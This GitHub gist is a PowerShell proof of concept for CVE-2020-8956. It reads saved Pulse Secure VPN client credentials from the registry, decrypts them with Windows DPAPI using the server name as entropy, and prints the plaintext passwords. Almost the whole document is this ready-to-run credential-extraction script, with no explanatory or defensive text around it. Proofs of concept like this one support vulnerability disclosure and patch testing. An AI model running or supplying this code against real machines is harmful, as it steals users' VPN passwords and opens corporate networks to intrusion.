Skip to content

Instantly share code, notes, and snippets.

@qkaiser
Created October 27, 2020 20:07
Show Gist options
  • Save qkaiser/52b96eec20c59a0797b5fcbffc2d4a82 to your computer and use it in GitHub Desktop.
Save qkaiser/52b96eec20c59a0797b5fcbffc2d4a82 to your computer and use it in GitHub Desktop.
CVE-2020-8956 - Powershell PoC
Add-Type -AssemblyName System.Security;
$ives = Get-ItemProperty -Path 'Registry::HKEY_USERS\*\Software\Pulse Secure\Pulse\User Data\*'
foreach($ive in $ives) {
$ivename = $ive.PSPath.split('\')[-1].ToUpper()
Write-Host "[+] Checking IVE $($ivename)..."
$seed = [System.Text.Encoding]::GetEncoding('UTF-16').getBytes($ivename)
# 3 possible value names for password
$encrypted = $ive.Password1
if(!$encrypted){
$encrypted = $ive.Password2
}
if(!$encrypted){
$encrypted = $ive.Password3
}
$plaintext = [Text.Encoding]::Unicode.GetString([Security.Cryptography.ProtectedData]::Unprotect($encrypted, $seed, 'CurrentUser'))
Write-Host "[+] Password is $($plaintext)"
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment